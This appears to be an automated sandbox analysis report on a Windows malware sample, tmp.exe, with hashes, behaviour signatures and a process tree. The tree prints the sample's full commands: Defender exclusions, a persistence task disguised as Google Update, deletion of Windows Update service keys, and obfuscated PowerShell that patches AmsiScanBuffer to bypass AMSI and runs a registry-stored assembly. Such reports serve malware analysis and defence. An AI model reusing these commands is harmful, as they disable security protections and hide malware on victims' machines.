Analysis

  • max time kernel
    23s
  • max time network
    30s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/11/2022, 07:06

General

  • Target

    tmp.exe

  • Size

    3.7MB

  • MD5

    35dbf36cc33d84930bac9d66a141af05

  • SHA1

    11e41f289355a99f812f400247632403feabd494

  • SHA256

    40ef7d8a6123e7842889f15406677fabf2534c5680f3c0df2c0087b7fe14ec63

  • SHA512

    d16cf2f1f29c6f5c838c08f055e39d2b54639ffd18b3d7dff950fc55a06c9ec495c2272456072ab014f7b81671b6ae66a89a73ccab3f78b4757f4e9129fb7fb5

  • SSDEEP

    98304:AJlcIHDP4vYrKkLBbpPAHeoqFnIBMzwNCX:+lzjP8YTBbpPA+CBbN

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:980
      • C:\Users\Admin\AppData\Local\Temp\tmp.exe
        "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Suspicious use of SetThreadContext
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2564
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#aiwmbiup#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3220
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2460
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2804
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1276
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4036
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4048
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2164
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:3200
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:3900
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:3172
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:3964
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:1272
        • C:\Windows\System32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
          3⤵
            PID:1416
          • C:\Windows\System32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
            3⤵
              PID:2672
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
              3⤵
              • Modifies security service
              PID:2652
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
              3⤵
                PID:4564
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                3⤵
                  PID:5072
              • C:\Windows\System32\dialer.exe
                C:\Windows\System32\dialer.exe
                2⤵
                  PID:2264
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#pavnoof#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:3276
                  • C:\Windows\system32\schtasks.exe
                    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                    3⤵
                      PID:1456
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:uHWZGivNdbfg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qgNWNnoPcBDfqq,[Parameter(Position=1)][Type]$EUPWWbfrCe)$BjSTNsQdAHU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+''+[Char](101)+''+'c'+'te'+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+'ry'+[Char](77)+'od'+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+'eT'+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'as'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+[Char](108)+'ass',[MulticastDelegate]);$BjSTNsQdAHU.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+'i'+'a'+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$qgNWNnoPcBDfqq).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');$BjSTNsQdAHU.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+'S'+'i'+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t,V'+[Char](105)+''+'r'+'t'+[Char](117)+''+'a'+''+'l'+'',$EUPWWbfrCe,$qgNWNnoPcBDfqq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+'nag'+[Char](101)+'d');Write-Output $BjSTNsQdAHU.CreateType();}$gfUWYheCoGJam=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+'em'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+'3'+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'eg'+'f'+''+'U'+''+'W'+''+[Char](89)+''+'h'+'eC'+[Char](111)+'G'+[Char](74)+''+[Char](97)+''+[Char](109)+'');$SyyKIEvEmEelXH=$gfUWYheCoGJam.GetMethod(''+[Char](83)+'y'+'y'+''+[Char](75)+''+[Char](73)+''+[Char](69)+''+[Char](118)+''+[Char](69)+''+[Char](109)+''+[Char](69)+''+[Char](101)+''+[Char](108)+''+'X'+''+[Char](72)+'',[Reflection.BindingFlags]''+'P'+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zmEgbFuRBooeHwQBCQD=uHWZGivNdbfg @([String])([IntPtr]);$xfZWAwHNwscrgAzetXdUyQ=uHWZGivNdbfg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xUEupmaiusY=$gfUWYheCoGJam.GetMethod(''+'G'+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+'rn'+[Char](101)+'l'+[Char](51)+'2'+'.'+'d'+[Char](108)+'l')));$aireQOTYHtNMpd=$SyyKIEvEmEelXH.Invoke($Null,@([Object]$xUEupmaiusY,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+''+'r'+''+[Char](97)+'r'+[Char](121)+'A')));$IdiHKEJAZRwQpmfEi=$SyyKIEvEmEelXH.Invoke($Null,@([Object]$xUEupmaiusY,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$MGSwPGI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aireQOTYHtNMpd,$zmEgbFuRBooeHwQBCQD).Invoke(''+'a'+'m'+[Char](115)+''+'i'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$yaLawzPwQgNQdxRWI=$SyyKIEvEmEelXH.Invoke($Null,@([Object]$MGSwPGI,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+'r')));$ysmZmRAlFR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IdiHKEJAZRwQpmfEi,$xfZWAwHNwscrgAzetXdUyQ).Invoke($yaLawzPwQgNQdxRWI,[uint32]8,4,[ref]$ysmZmRAlFR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$yaLawzPwQgNQdxRWI,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IdiHKEJAZRwQpmfEi,$xfZWAwHNwscrgAzetXdUyQ).Invoke($yaLawzPwQgNQdxRWI,[uint32]8,0x20,[ref]$ysmZmRAlFR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+'E').GetValue('di'+[Char](97)+''+'l'+''+[Char](101)+''+[Char](114)+'s'+'t'+'ag'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
                  1⤵
                    PID:4404
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:sxAlHkGsEkrW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PVfdBqcjETvkRA,[Parameter(Position=1)][Type]$MDqhJTadsk)$XLucTNvhpHO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+'Del'+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+'d'+''+','+''+'A'+''+'n'+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'A'+[Char](117)+''+'t'+''+'o'+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$XLucTNvhpHO.DefineConstructor(''+'R'+'T'+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+'l'+''+'N'+'a'+'m'+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$PVfdBqcjETvkRA).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+'i'+'me'+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$XLucTNvhpHO.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'H'+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+','+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+''+'o'+'t,Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MDqhJTadsk,$PVfdBqcjETvkRA).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $XLucTNvhpHO.CreateType();}$CBFCPAwfjGmvy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+'dl'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+'W'+'i'+''+[Char](110)+''+'3'+''+'2'+''+'.'+''+'U'+''+[Char](110)+''+'s'+''+'a'+''+'f'+'e'+'C'+''+[Char](66)+''+'F'+''+[Char](67)+''+[Char](80)+''+'A'+'w'+[Char](102)+''+[Char](106)+'Gmvy');$XGJJSJKaLNioJC=$CBFCPAwfjGmvy.GetMethod(''+[Char](88)+''+[Char](71)+'J'+'J'+'S'+'J'+'K'+[Char](97)+''+[Char](76)+''+[Char](78)+''+[Char](105)+''+[Char](111)+''+[Char](74)+''+[Char](67)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZKAYmDWLMrjBvvWclNj=sxAlHkGsEkrW @([String])([IntPtr]);$KrtYyAxqWFNeakRDbgWOvX=sxAlHkGsEkrW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rHwILIjbwEn=$CBFCPAwfjGmvy.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'eHa'+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+''+'.'+'d'+[Char](108)+'l')));$paISsFDuTYBwKC=$XGJJSJKaLNioJC.Invoke($Null,@([Object]$rHwILIjbwEn,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+'Li'+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$QGwDeQGEoFzhFmHxz=$XGJJSJKaLNioJC.Invoke($Null,@([Object]$rHwILIjbwEn,[Object](''+[Char](86)+'ir'+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$lakEoMF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($paISsFDuTYBwKC,$ZKAYmDWLMrjBvvWclNj).Invoke('a'+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+'l');$BuOMfhqPoczwbiadW=$XGJJSJKaLNioJC.Invoke($Null,@([Object]$lakEoMF,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+'n'+'B'+[Char](117)+''+'f'+'fe'+[Char](114)+'')));$ndxMmqlOXG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QGwDeQGEoFzhFmHxz,$KrtYyAxqWFNeakRDbgWOvX).Invoke($BuOMfhqPoczwbiadW,[uint32]8,4,[ref]$ndxMmqlOXG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BuOMfhqPoczwbiadW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QGwDeQGEoFzhFmHxz,$KrtYyAxqWFNeakRDbgWOvX).Invoke($BuOMfhqPoczwbiadW,[uint32]8,0x20,[ref]$ndxMmqlOXG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
                    1⤵
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4612
                  • C:\Program Files\Google\Chrome\updater.exe
                    "C:\Program Files\Google\Chrome\updater.exe"
                    1⤵
                      PID:4520
                    • C:\Windows\System32\dllhost.exe
                      C:\Windows\System32\dllhost.exe /Processid:{42f376f4-4d58-4234-a29b-ea604b4cc717}
                      1⤵
                        PID:1764

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Program Files\Google\Chrome\updater.exe

                        Filesize

                        3.7MB

                        MD5

                        35dbf36cc33d84930bac9d66a141af05

                        SHA1

                        11e41f289355a99f812f400247632403feabd494

                        SHA256

                        40ef7d8a6123e7842889f15406677fabf2534c5680f3c0df2c0087b7fe14ec63

                        SHA512

                        d16cf2f1f29c6f5c838c08f055e39d2b54639ffd18b3d7dff950fc55a06c9ec495c2272456072ab014f7b81671b6ae66a89a73ccab3f78b4757f4e9129fb7fb5

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        d85ba6ff808d9e5444a4b369f5bc2730

                        SHA1

                        31aa9d96590fff6981b315e0b391b575e4c0804a

                        SHA256

                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                        SHA512

                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        59d97011e091004eaffb9816aa0b9abd

                        SHA1

                        1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

                        SHA256

                        18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

                        SHA512

                        d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        c40b803b937e1f2c38fd0759eff18b78

                        SHA1

                        475f3882d731732dc873d02e6f2df33dee23ed30

                        SHA256

                        4c8a3ef2f1eba0567f12d40114dcd76265fcabe4d96b3c34a5e80133938bb4f7

                        SHA512

                        e0ae16727c518160608d1e79ee99bffc61b998ce1dcea8dbb3272a72ee917dd9fd64f0818578444da3bc06e11bfa2007ecd7501c3bd2776988a047a3162b32aa

                      • memory/580-177-0x00007FF9E5890000-0x00007FF9E58A0000-memory.dmp

                        Filesize

                        64KB

                      • memory/652-178-0x00007FF9E5890000-0x00007FF9E58A0000-memory.dmp

                        Filesize

                        64KB

                      • memory/992-133-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/992-132-0x000001B3C8640000-0x000001B3C8662000-memory.dmp

                        Filesize

                        136KB

                      • memory/1764-171-0x00007FFA255D0000-0x00007FFA2568E000-memory.dmp

                        Filesize

                        760KB

                      • memory/1764-170-0x00007FFA25810000-0x00007FFA25A05000-memory.dmp

                        Filesize

                        2.0MB

                      • memory/1764-175-0x0000000140000000-0x0000000140029000-memory.dmp

                        Filesize

                        164KB

                      • memory/1764-166-0x0000000140000000-0x0000000140029000-memory.dmp

                        Filesize

                        164KB

                      • memory/1764-169-0x0000000140000000-0x0000000140029000-memory.dmp

                        Filesize

                        164KB

                      • memory/1764-176-0x00007FFA25810000-0x00007FFA25A05000-memory.dmp

                        Filesize

                        2.0MB

                      • memory/3220-151-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3220-147-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3276-156-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3276-155-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4404-159-0x0000000001A80000-0x0000000001AB6000-memory.dmp

                        Filesize

                        216KB

                      • memory/4404-163-0x0000000004CA0000-0x0000000004D06000-memory.dmp

                        Filesize

                        408KB

                      • memory/4404-162-0x0000000004590000-0x00000000045F6000-memory.dmp

                        Filesize

                        408KB

                      • memory/4404-161-0x00000000043F0000-0x0000000004412000-memory.dmp

                        Filesize

                        136KB

                      • memory/4404-160-0x0000000004600000-0x0000000004C28000-memory.dmp

                        Filesize

                        6.2MB

                      • memory/4612-164-0x00007FFA25810000-0x00007FFA25A05000-memory.dmp

                        Filesize

                        2.0MB

                      • memory/4612-172-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4612-173-0x00007FFA25810000-0x00007FFA25A05000-memory.dmp

                        Filesize

                        2.0MB

                      • memory/4612-174-0x00007FFA255D0000-0x00007FFA2568E000-memory.dmp

                        Filesize

                        760KB

                      • memory/4612-165-0x00007FFA255D0000-0x00007FFA2568E000-memory.dmp

                        Filesize

                        760KB

                      • memory/4612-158-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp

                        Filesize

                        10.8MB